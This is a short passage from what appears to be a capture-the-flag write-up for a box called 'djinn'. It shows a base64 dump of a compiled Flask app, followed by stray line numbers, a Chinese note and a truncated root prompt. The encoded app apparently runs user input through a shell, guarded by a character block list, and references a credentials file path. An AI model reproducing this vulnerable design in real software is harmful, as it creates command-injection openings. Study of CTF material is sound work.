sam@djinn:/opt/80$ base64 app.pyc base64 app.pyc A/MNCgYZzF1jAAAAAAAAAAAIAAAAQAAAAHMIAQAAZAAAZAEAbAAAWgAAZAAAZAIAbAEAbQIAWgIA bQMAWgMAbQQAWgQAbQUAWgUAbQYAWgYAAWUCAGUHAIMBAFoIAGQDAGUIAF8JAGQEAFoKAGQFAGQG AGQHAGQIAGQJAGQKAGQLAGQMAGcIAFoLAGQNAIQAAFoMAGUIAGoNAGQFAGQOAGQPAGcBAIMBAWQQ AIQAAIMBAFoOAGUIAGoNAGQRAGQOAGQSAGQPAGcCAIMBAWQTAIQAAIMBAFoPAGUIAGoNAGQUAGQO AGQPAGQSAGcCAIMBAWQVAIQAAIMBAFoQAGUHAGQWAGsCAHIEAWUIAGoRAGQXAGQYAGQZAGUSAIMA AgFuAABkAQBTKBoAAABp/04oBQAAAHQFAAAARmxhc2t0CAAAAHJlZGlyZWN0dA8AAAByZW5k ZXJfdGVtcGxhdGV0BwAAAHJlcXVlc3R0BwAAAHVybF9mb3J0AwAAAGtleXMbAAAAL2hvbWUvbml0 aXNoLy5kZXYvY3JlZHMudHh0dAEAAAAvdAEAAAAudAEAAAA/dAEAAAAqdAEAAABedAEAAAAkdAQA AABldmFsdAEAAAA7YwEAAAADAAAABQAAAEMAAABzbwAAAHQAAHwAAGsGAHIcAGQBAHwAAGsHAHIc AHQBAFN5OgB4LwB0AgBEXScAfQEAeB4AfAAARF0WAH0CAHwBAHwCAGsCAHIzAHQDAFNxMwBXcSYA V3QBAFNXbhIABHQEAGsKAHJqAAEBAXQDAFNYZAAAUygCAAAATnQDAAAAY2F0KAUAAAB0BQAAAENS RURTdAQAAABUcnVldAMAAABSQ0V0BQAAAEZhbHNldAkAAABFeGNlcHRpb24oAwAAAHQDAAAAY21k dAEAAABpdAEAAABqKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAAHZhbGlkYXRlDQAA AHMUAAAAAAEYAQQCAwENAQ0BDAEMAQgBDQF0BwAAAG1ldGhvZHN0AwAAAEdFVGMAAAAAAAAAAAIA AABDAAAAcwoAAAB0AABkAQCDAQBTKAIAAABOcwkAAABtYWluLmh0bWwoAQAAAFICAAAAKAAAAAAo AAAAACgAAAAAcw4AAAAvb3B0LzgwL2FwcC5weXQFAAAAaW5kZXgbAAAAcwIAAAAAAnMFAAAAL3dp c2h0BAAAAFBPU1RjAAAAAAIAAAAGAAAAQwAAAHN4AAAAdAAAagEAagIAZAEAgwEAfQAAfAAAcmoA dAMAfAAAgwEAck4AdAQAagUAfAAAZAIAdAYAZAMAdAQAagcAgwECaggAagkAgwAAfQEAbgYAZAQA fQEAdAoAdAsAZAUAZAYAfAEAgwEBgwEAU3QMAGQHAIMBAFNkAABTKAgAAABOUhQAAAB0BQAAAHNo ZWxsdAYAAABzdGRvdXRzFQAAAFdyb25nIGNob2ljZSBvZiB3b3Jkc3QFAAAAZ2VuaWV0BAAAAG5h bWVzCQAAAHdpc2guaHRtbCgNAAAAUgMAAAB0BAAAAGZvcm10AwAAAGdldFIXAAAAdAoAAABzdWJw cm9jZXNzdAUAAABQb3BlblIQAAAAdAQAAABQSVBFUh0AAAB0BAAAAHJlYWRSAQAAAFIEAAAAUgIA AAAoAgAAAHQHAAAAZXhlY3V0ZXQGAAAAb3V0cHV0KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAu cHl0BAAAAHdpc2ggAAAAcxAAAAAAAhIBBgEMARIBGAIGAhYCcwYAAAAvZ2VuaWVjAAAAAAEAAAAE AAAAQwAAAHM6AAAAZAEAdAAAagEAawYAciQAdAAAagEAagIAZAEAgwEAfQAAbgYAZAIAfQAAdAMA ZAMAZAQAfAAAgwEBUygFAAAATlIfAAAAcxIAAABJdCdzIG5vdCB0aGF0IGhhcmRzCgAAAGdlbmll Lmh0bWx0BAAAAGZpbGUoBAAAAFIDAAAAdAQAAABhcmdzUiEAAABSAgAAACgBAAAAdAQAAABwYWdl KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHlSHgAAAC8AAABzCAAAAAACDwEVAgYCdAgAAABf X21haW5fX3QEAAAAaG9zdHMHAAAAMC4wLjAuMHQFAAAAZGVidWcoEwAAAFIiAAAAdAUAAABmbGFz a1IAAAAAUgEAAABSAgAAAFIDAAAAUgQAAAB0CAAAAF9fbmFtZV9fdAMAAABhcHB0CgAAAHNlY3Jl dF9rZXlSDwAAAFIRAAAAUhcAAAB0BQAAAHJvdXRlUhoAAABSKAAAAFIeAAAAdAMAAABydW5SEAAA ACgAAAAAKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAADxtb2R1bGU+AQAAAHMWAAAA DAIoAgwBCQIGAh4DCQ4hBSQPJAoMAQ==
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
将内容写入到app64
┌──(root声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/918255Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。
